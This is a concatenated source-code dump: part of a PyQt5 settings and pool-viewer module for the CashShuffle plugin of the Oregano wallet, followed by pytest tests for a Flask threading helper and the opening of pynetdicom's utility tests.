self.print_error("Error loading server list from {}: {}", fname, str(sys.exc_info()[1]))
return r
# /
servers = load_servers("servers.json")
selIdx, defIdx = (-1,)*2
self.cb.clear()
for host, d0 in sorted(servers.items()):
d = d0.copy()
d['server'] = host
item = _elide(host) + (' [ssl]' if d['ssl'] else '')
self.cb.addItem(item, d)
if selected and selected == d:
selIdx = self.cb.count()-1
elif defIdx < 0 and self._DEFAULT_HOST_SUBSTR in host:
defIdx = self.cb.count()-1
self.cb.addItem(_("(Custom)"))
if selIdx > -1:
self.cb.setCurrentIndex(selIdx)
elif selected and len(selected) == 3:
custIdx = self.cb.count()-1
self.cb.setItemData(custIdx, selected.copy())
self.cb.setCurrentIndex(custIdx)
elif defIdx > -1:
self.cb.setCurrentIndex(defIdx)
def refreshFromSettings(self):
selected = Plugin.get_and_validate_network_settings(self.config)
self.setup_combo_box(selected = selected)
return selected
def setup(self, msg):
vbox = QVBoxLayout(self)
if not msg:
msg = _("Choose a CashShuffle server or enter a custom server.\nChanges will require the CashShuffle plugin to restart.")
l = QLabel(msg + "\n")
l.setAlignment(Qt.AlignHCenter|Qt.AlignTop)
vbox.addWidget(l)
grid = QGridLayout()
vbox.addLayout(grid)
self.cb = QComboBox(self)
self.refreshFromSettings()
grid.addWidget(QLabel(_('Servers'), self), 0, 0)
grid.addWidget(self.cb, 0, 1)
grid.addWidget(QLabel(_("Host"), self), 1, 0)
hbox = QHBoxLayout(); grid.addLayout(hbox, 1, 1, 1, 2); grid.setColumnStretch(2, 1)
self.le = QLineEdit(self); hbox.addWidget(self.le)
self.le.textEdited.connect(lambda x='ignored': self.formChanged.emit())
hbox.addWidget(QLabel(_("P:"), self))
self.sb = QSpinBox(self); self.sb.setRange(1, 65535); hbox.addWidget(self.sb)
self.sb.valueChanged.connect(lambda x='ignored': self.formChanged.emit())
self.chk = QCheckBox(_("SSL"), self); hbox.addWidget(self.chk)
self.chk.toggled.connect(lambda x='ignored': self.formChanged.emit())
self.cb.currentIndexChanged.connect(lambda x='ignored': self.from_combobox())
self.from_combobox()
hbox2 = QHBoxLayout()
vbox.addLayout(hbox2)
self.statusGB = QGroupBox(_("Status"), self)
hbox2.addWidget(self.statusGB)
vbox2 = QVBoxLayout(self.statusGB)
self.statusLabel = QLabel("", self.statusGB)
self.statusLabel.setMinimumHeight(50)
self.statusLabel.setAlignment(Qt.AlignAbsolute|Qt.AlignTop)
vbox2.addWidget(self.statusLabel)
# add the "Coin selection settings..." link
self.coinSelectionSettingsLabel = QLabel("<a href='dummy'>{}</a>".format(_("Coin selection settings...")))
self.coinSelectionSettingsLabel.linkActivated.connect(self.onCoinSelectionSettingsClick)
vbox.addWidget(self.coinSelectionSettingsLabel)
self.vbox = vbox
if not isinstance(self, SettingsTab):
# add close button only if not SettingsTab
vbox.addStretch()
buttons = Buttons(CloseButton(self), OkButton(self))
vbox.addLayout(buttons)
# NEW! add the "View pools..." button to the bottom
vbox = self.statusGB.layout()
hbox = QHBoxLayout()
hbox.addStretch(1)
self.poolsBut = QPushButton(_("View pools..."))
f = self.poolsBut.font(); f.setPointSize(f.pointSize()-(2 if sys.platform=='darwin' else 1)); self.poolsBut.setFont(f)
hbox.addWidget(self.poolsBut)
hbox.addStretch(1)
vbox.addLayout(hbox)
self.statusChanged.connect(self._vpGotStatus)
self.poolsBut.setEnabled(False)
self.poolsBut.clicked.connect(self._vpOnPoolsBut, Qt.DirectConnection)
def kill(self):
self.stopNetworkChecker()
def onCoinSelectionSettingsClick(self, ignored):
win = CoinSelectionSettingsWindow()
win.exec_()
win.deleteLater()
if self.window().isVisible():
self.window().raise_()
self.activateWindow()
def _vpGotStatus(self, sdict):
self._vpLastStatus = sdict.copy()
if sdict.get('status') in (_("Ok"), _("Banned")):
self.poolsBut.setEnabled(True)
else:
self.poolsBut.setEnabled(False)
def _vpOnPoolsBut(self):
w = PoolsWinMgr.show(self._vpLastStatus, self.get_form(), self.config, modal=True)
def _on_statusChanged(self, d):
red, blue, green = "red", "blue", "green"
try: red, blue, green = ColorScheme.RED._get_color(0), ColorScheme.BLUE._get_color(0), ColorScheme.GREEN._get_color(0)
except AttributeError: pass
#self.print_error("status changed", d)
if not d: # Empty dict means we are connecting
self.serverOk = None
self.statusLabel.setText("<font color=\"{}\"><i>{}</i></font>".format(blue, _("Checking server...")))
return
if d.get('failed'): # Dict with only 1 key, 'failed', means the connection failed
reason = d['failed']
if reason == 'offline_mode':
reason = _("Oregano is in offline mode.")
elif reason == 'bad':
reason = _("Server is misconfigured")
elif reason == 'ssl':
reason = _("Failed to verify SSL certificate")
else:
reason = _("Connection failure")
self.statusLabel.setText("<b>" + _("Status") + ":</b> <font color=\"{}\">{}</font>".format(red, reason))
self.serverOk = False
return
# any other case has all the below keys defined
self.serverOk = d['status'] == _('Ok')
self.statusLabel.setText(
'''
<b>{}:</b> <i>{}</i><br>
<b>{}:</b> <font color="{}">{}</font> {} {}
<small>{}: {} {}: {} {}: {}</small>
'''
.format(_('Server'), _elide(d['host'], maxlen=40, startlen=12),
_('Status'), green if not d['banned'] else "#dd4444", d['status'], " <b>{}</b> {}".format(_("Ban score:"),d['banScore']) if d['banScore'] else '', '<br>' if d['banScore'] else '',
_('Pool size'), d['poolSize'],
_('Connections'),
d['connections'],
_('Active pools'), d['pools'])
)
def _on_formChange(self):
try:
#self.print_error("onFormChange")
d = self.get_form()
self.settingsChanged.emit(d)
except RuntimeError as e:
# Paranoia guard against C++ object deleted exception
# (we may get called from a QTimer.singleShot below)
if 'C++' not in str(e).upper():
raise
def startNetworkChecker(self):
if self.networkChecker: return
self.networkChecker = NetworkChecker(self)
self.statusChanged.connect(self._on_statusChanged, Qt.QueuedConnection)
self.formChanged.connect(self._on_formChange, Qt.QueuedConnection)
self.print_error("Starting network checker...")
self.networkChecker.start()
QTimer.singleShot(100, self._on_formChange) # kicks off the network checker by sending it new settings
def stopNetworkChecker(self):
if self.networkChecker:
try: self.statusChanged.disconnect(self._on_statusChanged)
except TypeError: pass # not connected
try: self.formChanged.disconnect(self._on_formChange)
except TypeError: pass # not connected
self.networkChecker.stop()
self.networkChecker = None
self.print_error("Stopped network checker.")
# /
# /SettingsDialogMixin
class SettingsDialog(SettingsDialogMixin, AppModalDialog):
''' Concrete class for the stand-alone Settings window you get when
you right-click and get "CashShuffle Settings..." from the CashShuffle status
button context menu '''
def __init__(self, title, config, message=None, windowFlags=None):
AppModalDialog.__init__(self, title=title, windowFlags=windowFlags, parent=None)
self.setMinimumSize(400, 350)
SettingsDialogMixin.__init__(self, config=config, message=message)
# /SettingsDialog
class SettingsTab(SettingsDialogMixin, QWidget):
# Apparently if you inherit from a C++ object first it creates problems.
# You are supposed to inherit from the mixins in Python first, then the
# Qt C++ object last. Who knew. All of Oregano codebase apparently
# is doing it wrong.
# See this: http://python.6.x6.nabble.com/Issue-with-multiple-inheritance-td5207771.html
# So we inherit from our mixin first. (Note I had problems with overriding
# __init__ here and Qt's C++ calling the wrong init here.) An illustrative
# sketch of this mixin-first ordering appears just after this class.
applyChanges = pyqtSignal(object)
def __init__(self, parent, config, message=None):
QWidget.__init__(self, parent=parent)
SettingsDialogMixin.__init__(self, config=config, message=message)
# add the "Apply" button to the bottom
self.apply = QPushButton(_("Apply"), self)
hbox = QHBoxLayout()
self.vbox.addLayout(hbox)
self.vbox.addStretch()
hbox.addStretch(1)
hbox.addWidget(self.apply)
self.apply.clicked.connect(self._re_emit_applyChanges)
def _re_emit_applyChanges(self):
self.applyChanges.emit(self)
def _vpOnPoolsBut(self):
w = PoolsWinMgr.show(self._vpLastStatus, self.get_form(), self.config, modal=False, parent_window=self)
# /SettingsTab
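# ---------------------------------------------------------------------------
# Illustrative sketch only -- the two classes below are not used by the
# plugin and their names are made up for the example.  They restate the
# inheritance-order convention described in the comment at the top of
# SettingsTab above: put the plain Python mixin first and the Qt C++ base
# (QWidget) last, the same ordering SettingsTab and SettingsDialog use.  A
# pyqtSignal declared on the plain mixin only becomes a usable bound signal
# once the concrete class also derives from a QObject type, which is why the
# mixins in this file are never instantiated on their own.  pyqtSignal and
# QWidget are already imported at the top of this module; the imports are
# repeated here only so the sketch reads as self-contained.
# ---------------------------------------------------------------------------
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtWidgets import QWidget

class _ExampleSignalMixin:
    exampleChanged = pyqtSignal(str)  # unbound here; bound in the concrete QWidget subclass

class _ExampleSettingsWidget(_ExampleSignalMixin, QWidget):
    # Mixin first, Qt C++ base last.  Instantiating still requires a running
    # QApplication, as with any QWidget.
    def announce(self, text):
        self.exampleChanged.emit(text)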
class NetworkChecker(PrintError):
''' Runs in a separate thread, checks the server automatically when the settings form changes
and publishes results to GUI thread. '''
pollTimeSecs = 15.0
checkShufflePort = True
verifySSL = True # if true, verify the ssl socket of the shuffle port when checking the server
def __init__(self, parent):
assert isinstance(parent, NetworkCheckerDelegateMixin), "Parent to NetworkChecker must be a NetworkCheckerDelegateMixin"
self.weakParent = Weak.ref(parent)
self.q = queue.Queue()
self.thread = threading.Thread(target=self.thread_func, daemon=True)
self._please_stop = False
self._sock = None
self._update_ct = 0
parent.settingsChanged.connect(self._on_settings_changed, Qt.QueuedConnection)
self.print_error("created")
finalization_print_error(self)
def stop(self):
if self.thread.is_alive():
self._please_stop = True
self.q.put(None) # signal to thread to die
try: self._sock.close() # force close thread
except: pass
self.thread.join(timeout=15.0) # wait for thread to finish
if self.thread.is_alive():
# This should never happen
self.print_error("*** WARNING: Waited for thread to exit for 15.0 seconds, but it is still running! FIXME!")
def start(self):
if not self.thread.is_alive():
self.q.put(None) # paranoia just in case
self.q = queue.Queue() # clear the queue
self._please_stop = False
self.thread.start() # this raises RuntimeError if called more than once.
def _on_settings_changed(self, d):
self._update_ct = 0 # reset ctr for these settings. ctr = 0 causes us to tell gui to draw the "Connecting, please wait..." text
self.q.put(d.copy()) # notify thread which waits on this q
def _wait_drain_q(self, last_settings):
q = self.q
try:
res = None
try:
# Drain queue to get latest settings
while True:
# keep reading from the queue until it's empty
res = q.get_nowait()
if res is None:
# we got a None, return early -- this indicates abort thread
return res
except queue.Empty:
''' No settings were waiting in queue.. move to blocking
operation '''
if self._please_stop:
return # indicate stop
if res is not None:
# we had a result, return
return res
# no result from Queue, block for pollTimeSecs
return q.get(timeout=self.pollTimeSecs)
except queue.Empty:
# no result in pollTimeSecs, return last settings value
return last_settings
def thread_func(self):
try:
self.print_error("thread entered")
settings = dict()
while True:
settings = self._wait_drain_q(settings)
if settings is None:
return # exit thread if we got a None
if settings:
self._on_update_status(settings)
finally:
self.print_error("thread exiting")
def _emit_status_changed(self, d):
self.weakParent() and self.weakParent().statusChanged.emit(d)
def _on_update_status(self, d):
d = d.copy()
#self.print_error("updateStatus", d) # XXX
is_bad_server, is_bad_ssl, is_offline_mode = False, False, False
try:
if not Network.get_instance():
is_offline_mode = True
raise RuntimeError("No network")
if self._update_ct == 0:
self._emit_status_changed(dict()) # tells GUI we are "connecting..."
self._update_ct += 1
port, poolSize, connections, pools, banScore, banned = query_server_for_stats(d['server'], d['info'], d['ssl'])
if self._please_stop:
return
if poolSize < 3:
# hard-coded -- do not accept servers with poolSize < 3
is_bad_server = True
raise RuntimeError("PoolSize must be >=3, got: {}".format(poolSize))
if d['ssl'] and self.verifySSL and not verify_ssl_socket(d['server'], int(port), timeout=7.5):
is_bad_ssl = True
raise RuntimeError("Could not verify SSL server certificate.")
if self._please_stop:
return
if self.checkShufflePort:
self._sock = socket.create_connection((d['server'], port), 5.0) # test connectivity to port
self._sock.close()
self._sock = None
if self._please_stop:
return
self._emit_status_changed({
'host' : d['server'],
'status' : _('Ok') if not banned else _('Banned'),
'poolSize' : str(poolSize),
'connections' : str(connections),
'pools' : str(len(pools)),
'poolsList' : pools,
'banScore' : banScore,
'banned' : banned,
'name' : d['server'] + ":" + str(d['info']),
'info' : d['info'],
'ssl' : d['ssl'],
})
except Exception as e:
# DEBUG
#import traceback
#traceback.print_exc()
# /DEBUG
self.print_error("exception on connect:",str(e))
if is_offline_mode:
self._emit_status_changed({'failed' : 'offline_mode'})
elif is_bad_ssl:
self._emit_status_changed({'failed' : 'ssl'})
elif is_bad_server:
self._emit_status_changed({'failed' : 'bad'})
else:
self._emit_status_changed({'failed' : 'failed'})
# / NetworkChecker
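# ---------------------------------------------------------------------------
# Illustrative sketch only -- this helper is not called anywhere and its name
# is made up.  It restates the queue-draining pattern NetworkChecker's
# _wait_drain_q uses above: drain the queue to pick up the newest settings,
# treat None as the "stop the thread" sentinel, otherwise block for up to
# poll_time seconds and fall back to the previous settings on timeout.
# ---------------------------------------------------------------------------
def _example_latest_or_previous(q, previous, poll_time=15.0):
    import queue  # repeats the module-level import so the sketch is self-contained
    latest = None
    try:
        while True:              # drain everything queued so far
            latest = q.get_nowait()
            if latest is None:   # None is the conventional "stop" sentinel
                return None
    except queue.Empty:
        if latest is not None:   # newer settings arrived; use the newest
            return latest
    try:
        return q.get(timeout=poll_time)  # nothing was queued: block briefly
    except queue.Empty:
        return previous          # timed out: keep the last known settings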
class PoolsWinMgr(QObject, PrintError):
simpleChangedSig = pyqtSignal()
_instance = None
def __init__(self):
assert not PoolsWinMgr._instance, "More than 1 PoolsWinMgr instance detected -- PoolsWinMgr is a singleton!"
super().__init__()
PoolsWinMgr._instance = self
self.poolWindows = {}
self.print_error("created")
#DEBUG
destroyed_print_error(self)
def __del__(self):
stale = True
if PoolsWinMgr._instance is self:
PoolsWinMgr._instance = None
stale = False
print_error("[{}] finalized{}".format(__class__.__name__, " (stale instance)" if stale else ''))
if hasattr(super(), '__del__'):
super().__del__()
#public methods
@classmethod
def instance(cls, create_if_missing=True):
if not cls._instance and create_if_missing:
cls._instance = cls()
return cls._instance
@classmethod
def killInstance(cls):
if cls._instance:
cls._instance._killAll()
cls._instance.deleteLater()
cls._instance = None
@classmethod
def closeAll(cls):
''' This implicitly will also delete all the windows when event loop next runs. '''
app = QApplication.instance()
if app:
poolWins = [w for w in app.topLevelWidgets() if isinstance(w, PoolsWindow)]
for w in poolWins:
w.close()
@classmethod
def show(cls, stats_dict, network_settings, config, *, parent_window=None, modal=False):
mgr = cls.instance()
return mgr._createOrShow(stats_dict, network_settings, config, parent_window=parent_window, modal=modal)
#private methods
def _createOrShow(self, stats_dict, network_settings, config, *, parent_window=None, modal=False):
d = stats_dict
if not isinstance(d, dict) or not d or not network_settings:
self.print_error("createOrShow: got invalid args.. will not create/show a window")
return
name = d['name']
w = self.poolWindows.get(name)
if w and ((modal and w.windowModality() != Qt.ApplicationModal)
or (not modal and w.windowModality() != Qt.NonModal)):
self.print_error("Found extant window {} but modal spec != extant modal, killing...".format(name))
self._kill(name)
w = None
if not w:
self.print_error("Creating", name)
w = PoolsWindow(config, parent_window, d, network_settings, modal=modal)
self.poolWindows[name] = w
w.closed.connect(self._kill) # clean-up instance
else:
self.print_error("Updating", name)
w.weakParent = Weak.ref(parent_window) if parent_window else None
w.settings = network_settings
w.settingsChanged.emit(w.settings)
if w.isMinimized():
w.showNormal()
w.show(); w.raise_(); w.activateWindow()
return w
def _kill(self, name):
window = self.poolWindows.pop(name) # will actually delete the QWidget instance.
window.stopNetworkChecker()
window.deleteLater() # force Qt delete. This call may be superfluous
self.print_error("Killed", name)
def _killAll(self):
for n in self.poolWindows.copy():
self._kill(n)
# /PoolsWinMgr
class PoolsWindow(QWidget, PrintError, NetworkCheckerDelegateMixin):
closed = pyqtSignal(str)
# from base: settingsChanged = pyqtSignal(dict)
# from base: statusChanged = pyqtSignal(dict)
def __init__(self, config, pseudo_parent, serverDict, settings, modal=False):
super().__init__() # top-level window
self.setWindowModality(Qt.ApplicationModal if modal else Qt.NonModal)
self.config = config
self.weakParent = Weak.ref(pseudo_parent) if pseudo_parent else None
self.sdict = serverDict.copy()
self.settings = settings
self.networkChecker = None
self.needsColumnSizing = True
name = self.sdict['name']
self.setObjectName(name)
self.setWindowTitle("CashShuffle - {} - Pools".format(_elide(name)))
self.vbox = QVBoxLayout(self)
# pools group box
self.poolsGB = QGroupBox(_("{} Pools").format(_elide(name)) + " (0)")
self.vbox.addWidget(self.poolsGB)
self.vbox.setStretchFactor(self.poolsGB, 2)
vbox2 = QVBoxLayout(self.poolsGB)
# ban label
self.banLabel = HelpLabel('', _("Bans usually occur when other shufflers detected invalid inputs coming from your client. Bans are temporary and usually last up to 30 minutes.\n\nThey may happen occasionally in rare circumstances. However, if this keeps happening please contact the developers and file a bug report."))
self.banLabel.setHidden(True)
vbox2.addWidget(self.banLabel)
self.tree = QTreeWidget()
self.tree.setSelectionMode(QAbstractItemView.NoSelection)
self.tree.setMinimumHeight(50)
self.tree.setHeaderItem(QTreeWidgetItem([_('Tier'), _('Players'), _('Type'), _('Version'), _('Full')]))
vbox2.addWidget(self.tree)
# The "simple view" checkbox
hbox = QHBoxLayout()
self.simpleChk = QCheckBox(_("Omit incompatible pools")) # NB: checkbox state will be set in self.refresh()
hbox.addWidget(self.simpleChk)
vbox2.addLayout(hbox)
# bottom buts
self.vbox.addStretch()
hbox = QHBoxLayout()
self.closeBut = QPushButton(_("Close"))
hbox.addStretch(1)
hbox.addWidget(self.closeBut)
self.vbox.addLayout(hbox)
# signals
self.closeBut.clicked.connect(self.close)
self.closeBut.setDefault(True)
self.statusChanged.connect(self.refresh)
self.simpleChk.clicked.connect(self._setSimple)
# NB: some signal/slot connections are also made in showEvent()
# etc...
self.resize(400,300)
#DEBUG
destroyed_print_error(self)
def diagnostic_name(self):
return "{}/{}".format(super().diagnostic_name(), self.objectName())
def closeEvent(self, e):
#self.print_error("Close")
self.closed.emit(self.objectName())
parent = self.weakParent and self.weakParent()
if isinstance(parent, QWidget) and parent.isVisible() and parent.window().isVisible():
try:
# for some reason closing this dialog raises the wallet window and not the network dialog
# activate the network dialog if it's up..
parent.window().activateWindow()
except RuntimeError as e:
# Deal with wrapped C/C++ object deleted. For some reason
# the weakRef is still alive even after C/C++ deletion
# (and no other references referencing the object!).
if 'C++' in str(e):
self.print_error("Underlying C/C++ object deleted. Working around PyQt5 bugs and ignoring...")
else:
raise
super().closeEvent(e)
e.accept()
def hideEvent(self, e):
super().hideEvent(e)
if e.isAccepted():
#self.print_error("Hide")
try: PoolsWinMgr.instance().simpleChangedSig.disconnect(self._simpleChangedSlot)
except TypeError: pass # Not connected.
self.stopNetworkChecker()
def showEvent(self, e):
super().showEvent(e)
if e.isAccepted():
#self.print_error("Show")
PoolsWinMgr.instance().simpleChangedSig.connect(self._simpleChangedSlot)
self.refresh(self.sdict)
self.startNetworkChecker()
# do stuff related to refreshing, etc here...
def _isSimple(self):
return bool(self.config.get(ConfKeys.Global.VIEW_POOLS_SIMPLE, True))
def _setSimple(self, b):
b = bool(b)
if b != self._isSimple():
self.config.set_key(ConfKeys.Global.VIEW_POOLS_SIMPLE, b)
self.needsColumnSizing = True
PoolsWinMgr.instance().simpleChangedSig.emit()
def _simpleChangedSlot(self):
self.refresh(self.sdict)
def refresh(self, sdict):
# NB: sdict may be non-empty (has actual results) but still contain no
# pools if server has no pools. It's only empty before we get a response
# from stats port.
if not sdict:
return
if self.sdict is not sdict:
self.sdict = sdict.copy()
simple = self._isSimple()
self.simpleChk.setChecked(simple)
mysettings = BackgroundShufflingThread.latest_shuffle_settings
# handle if we detected a ban
if self.sdict.get('banned'):
banScore = self.sdict.get('banScore') or 0
self.banLabel.setText('<font color="#dd4444"><b>{}</b></font> (ban score: {})'.format(_("Banned"), banScore))
self.banLabel.setHidden(False)
else:
self.banLabel.setHidden(True)
pools = self.sdict.get('poolsList', list()).copy()
poolSize = str(self.sdict.get('poolSize', ''))
self.tree.clear()
try:
pools.sort(reverse=True, key=lambda x:(0 if x['full'] else 1, x['amount'], x['members'], -x.get('version',0)))
except (KeyError, ValueError, TypeError):
# hmm. Pools dict is missing or has bad keys. Assume bad input. Clear list and proceed with a 'no pools' message
pools = []
for c in range(2,4):
self.tree.setColumnHidden(c, simple)
def grayify(twi):
b = twi.foreground(0)
b.setColor(Qt.gray)
for i in range(twi.columnCount()):
twi.setForeground(i, b)
for p in pools:
typ, version = p.get('type', mysettings.type_name), p.get('version', mysettings.version)
is_my_settings = typ == mysettings.type_name and version == mysettings.version
if not simple or is_my_settings:
twi = QTreeWidgetItem([
format_satoshis_plain(p['amount']) + " XRG",
"{} / {}".format(str(p['members']), poolSize),
str(p.get('type','?')).lower(),
str(p.get('version','?')),
"√" if p['full'] else '-',
])
if not is_my_settings:
grayify(twi)
self.tree.addTopLevelItem(twi)
tit = self.poolsGB.title().rsplit(' ', 1)[0]
self.poolsGB.setTitle(tit + " ({})".format(self.tree.topLevelItemCount()))
def sizeColumnsToFit():
for i in range(self.tree.columnCount()):
self.tree.resizeColumnToContents(i)
if not self.tree.topLevelItemCount():
twi = QTreeWidgetItem([_('No Pools'), '', '', '', ''])
f = twi.font(0); f.setItalic(True); twi.setFont(0, f)
self.tree.addTopLevelItem(twi)
self.tree.setFirstItemColumnSpanned(twi, True)
self.tree.setHeaderHidden(True)
sizeColumnsToFit() # in no pools mode we unconditionally size to fit
self.needsColumnSizing = True # once we enter this "No pools.." mode, we need to force resize columns next time we have real entries to avoid layout weirdness
else:
self.tree.setHeaderHidden(False)
if self.needsColumnSizing: # this flag suppresses resizing each refresh to allow users to manually size the columns after a display with real data appears.
sizeColumnsToFit()
self.needsColumnSizing = False
def _kick_off_nc(self):
try:
self.settingsChanged.emit(self.settings) # kicks off the NetworkChecker by sending it some server settings to check
except RuntimeError:
pass # paranoia: guard against wrapped C++ object exception.. shouldn't happen because timer was keyed off this object as receiver
def startNetworkChecker(self):
if self.networkChecker: return
self.networkChecker = nc = NetworkChecker(self)
nc.pollTimeSecs, nc.verifySSL, nc.checkShufflePort = 2.0, False, False
self.print_error("Starting network checker...")
self.networkChecker.start()
QTimer.singleShot(500, self._kick_off_nc) # despite appearances the timer will not fire after object deletion, due to PyQt5 signal/slot receiver rules
def stopNetworkChecker(self):
if self.networkChecker:
self.networkChecker.stop() # waits for network checker to finish...
self.networkChecker = None
self.print_error("Stopped network checker.")
# /PoolsWindow
class CoinSelectionSettingsWindow(AppModalDialog, PrintError):
''' The pop-up window to manage minimum/maximum coin amount settings.
Accessible from a link in the "CashShuffle Settings.." window or Network
Dialog tab. '''
def __init__(self, title=None):
super().__init__(title=title or _("CashShuffle - Coin Selection Settings"), parent=None)
vbox = QVBoxLayout(self)
lbl = QLabel(_("Specify minimum and maximum coin amounts to select for shuffling:"))
lbl.setWordWrap(True)
vbox.addWidget(lbl)
hbox = QHBoxLayout()
hbox.addWidget(HelpLabel(_("Minimum coin:"),
_("Coins (UTXOs) below this amount will not be selected for shuffling.")))
self.minEdit = BTCAmountEdit(decimal_point=self._decimal_point,
parent=self)
hbox.addWidget(self.minEdit)
vbox.addLayout(hbox)
hbox = QHBoxLayout()
hbox.addWidget(HelpLabel(_("Maximum coin:"),
_("Coins (UTXOs) up to this amount will be selected for shuffling.")))
self.maxEdit = BTCAmountEdit(decimal_point=self._decimal_point,
parent=self)
hbox.addWidget(self.maxEdit)
vbox.addLayout(hbox)
self.maxEdit.textEdited.connect(self.clearErr)
self.minEdit.textEdited.connect(self.clearErr)
vbox.addStretch()
self.errLabel = QLabel("")
self.errLabel.setAlignment(Qt.AlignCenter)
vbox.addWidget(self.errLabel)
vbox.addStretch()
vbox.addLayout(Buttons(CancelButton(self),
EnterButton(_("Defaults"), self.default),
EnterButton(_("Apply"), self.apply),
))
self.resize(320,200)
self.fromConfig()
# DEBUG Qt destruction
destroyed_print_error(self)
def _decimal_point(self): return get_config().get('decimal_point', 8)
def _fmt_amt(self, amt): return format_satoshis_plain(amt, self._decimal_point())
def apply(self):
lower, upper = self.minEdit.get_amount(), self.maxEdit.get_amount()
if not lower or not upper or upper <= lower:
self.setErr(_("Invalid amount"))
return
hard_upper = BackgroundShufflingThread.hard_upper_bound()
if upper > hard_upper:
self.setErr(_("Upper limit is {}").format(self._fmt_amt(hard_upper)))
return
hard_lower = BackgroundShufflingThread.hard_lower_bound()
if lower < hard_lower:
self.setErr(_("Lower limit is {}").format(self._fmt_amt(hard_lower)))
return
if (lower, upper) != tuple(BackgroundShufflingThread.update_lower_and_upper_bound_from_config()):
pre = ''
if (lower, upper) == self._get_defaults():
BackgroundShufflingThread.reset_lower_and_upper_bound_to_defaults()
pre = _("Default values restored.\n\n")
else:
actual_lower, actual_upper = BackgroundShufflingThread.set_lower_and_upper_bound(lower, upper)
if (lower, upper) != (actual_lower, actual_upper):
pre = _("Actual amounts applied: {} and {}.\n\n").format(self._fmt_amt(actual_lower),
self._fmt_amt(actual_upper))
            self.show_message(pre+_("Changes will take effect when the next shuffle round starts (usually within a few minutes)."))
self.accept()
def fromConfig(self):
lower, upper = BackgroundShufflingThread.update_lower_and_upper_bound_from_config()
self.minEdit.setAmount(lower)
self.maxEdit.setAmount(upper)
self.clearErr()
def _get_defaults(self): return BackgroundShufflingThread.DEFAULT_LOWER_BOUND, BackgroundShufflingThread.DEFAULT_UPPER_BOUND
def default(self):
lower, upper = self._get_defaults()
self.minEdit.setAmount(lower)
self.maxEdit.setAmount(upper)
self.clearErr()
def setErr(self, txt='', noerr=False):
txt = txt or ""
if noerr:
try: color = ColorScheme.DEFAULT._get_color(0)
except AttributeError: color = "#666666"
else:
try: color = ColorScheme.RED._get_color(0)
except AttributeError: color = "red"
self.errLabel.setText('<font color="{}">{}</font>'.format(color, txt))
def clearErr(self): self.setErr('', noerr=True)
# /CoinSelectionSettingsWindow
|
test_flask_threads.py
|
from unittest.mock import Mock
import pytest
from flask import g
from flask import jsonify
from flaskthreads import AppContextThread
from flaskthreads import ThreadPoolWithAppContextExecutor
TEST_URL = '/test'
TEST_G = 'TEST'
TEST_RESULT = {'ok': True}
def test_app_context_thread(flask_app):
"""Test accessing flask.g from another thread."""
mock_action = Mock()
@flask_app.route(TEST_URL)
def test_handler():
g.test = TEST_G
thread = AppContextThread(target=lambda: mock_action.action(g.test))
thread.start()
thread.join()
return jsonify(TEST_RESULT)
with flask_app.test_client() as client:
result = client.get(TEST_URL)
assert result.get_json() == TEST_RESULT
mock_action.action.assert_called_with(TEST_G)
def test_running_without_flask_context():
"""Test running AppContextThread outside of flask app raises an error."""
mock_action = Mock()
with pytest.raises(RuntimeError):
thread = AppContextThread(target=lambda: mock_action.action())
thread.start()
thread.join()
mock_action.action.assert_not_called()
def test_app_context_executor(flask_app):
"""Test accessing flask.g from another thread with futures."""
mock_action = Mock()
@flask_app.route(TEST_URL)
def test_handler():
g.test = TEST_G
with ThreadPoolWithAppContextExecutor(max_workers=2) as pool:
future = pool.submit(lambda: mock_action.action(g.test))
future.result()
return jsonify(TEST_RESULT)
with flask_app.test_client() as client:
result = client.get(TEST_URL)
assert result.get_json() == TEST_RESULT
mock_action.action.assert_called_with(TEST_G)
def test_executor_running_without_flask_context():
"""Test running ThreadPoolWithAppContextExecutor without flask."""
mock_action = Mock()
with pytest.raises(RuntimeError):
with ThreadPoolWithAppContextExecutor(max_workers=2) as pool:
future = pool.submit(lambda: mock_action.action())
future.result()
mock_action.action.assert_not_called()
def test_executor_transfers_exceptions_to_calling_thread(flask_app):
    """Test the executor transfers raised exceptions to the calling thread."""
def raises():
raise RuntimeError("foo")
@flask_app.route(TEST_URL)
def test_handler():
g.test = TEST_G
with ThreadPoolWithAppContextExecutor(max_workers=1) as pool:
future1 = pool.submit(raises)
future2 = pool.submit(lambda: 42)
with pytest.raises(RuntimeError):
future1.result()
future2.result()
return jsonify(TEST_RESULT)
with flask_app.test_client() as client:
result = client.get(TEST_URL)
assert result.get_json() == TEST_RESULT
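# The tests in this module rely on a `flask_app` pytest fixture that is not
# defined here (presumably it lives in conftest.py). Purely as a hedged,
# minimal sketch of what such a fixture might look like -- a bare Flask app
# with no extra configuration -- the fixture below would do; it is given a
# different name so it cannot shadow the real fixture.
@pytest.fixture
def flask_app_sketch():
    from flask import Flask  # local import; only the Flask class is assumed here
    return Flask(__name__)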
|
test_utils.py
|
"""Unit tests for the pynetdicom.utils module."""
from io import BytesIO
from threading import Thread
import logging
import sys
import pytest
from pydicom.uid import UID
from pynetdicom import _config, debug_logger
from pynetdicom.utils import (
pretty_bytes, validate_uid, make_target, set_uid, decode_bytes
)
from .encoded_pdu_items import a_associate_rq
#debug_logger()
REFERENCE_GOOD_AE_STR = [
('a', b'a '),
('a b', b'a b'),
('a b', b'a b '),
(' b', b'b '),
(' ab c ', b'ab c '),
(' ab c ', b'ab c '),
('ABCDEFGHIJKLMNOPQRSTUVWXYZ', b'ABCDEFGHIJKLMNOP')
]
REFERENCE_GOOD_AE_BYTES = [
(b'a', b'a '),
(b'a b', b'a b'),
(b'a b', b'a b '),
(b' b', b'b '),
(b' ab c ', b'ab c '),
(b' ab c ', b'ab c '),
(b'ABCDEFGHIJKLMNOPQRSTUVWXYZ', b'ABCDEFGHIJKLMNOP')
]
REFERENCE_BAD_AE_STR = [
' ', # empty, 16 chars 0x20
'', # empty
'AE\\TITLE', # backslash
'AE\tTITLE', # control char, tab
'AE\rTITLE', # control char, carriage return
'AE\nTITLE', # control char, new line
u'\u0009'.encode('ascii'), # \t
u'\u000A'.encode('ascii'), # \n
u'\u000C'.encode('ascii'), # \x0c
u'\u000D'.encode('ascii'), # \x0d
u'\u001B'.encode('ascii'), # \x1b
u'\u005C'.encode('ascii'), # \\
u'\u0001'.encode('ascii'), # \x01
u'\u000e'.encode('ascii'), # \x0e
1234,
45.1,
]
REFERENCE_BAD_AE_BYTES = [
b' ', # empty, 16 chars 0x20
b'', # empty
b'AE\\TITLE', # backslash
b'AE\tTITLE', # control char, tab
b'AE\rTITLE', # control char, carriage return
b'AE\nTITLE', # control char, new line
u'\u0009'.encode('ascii'), # \t
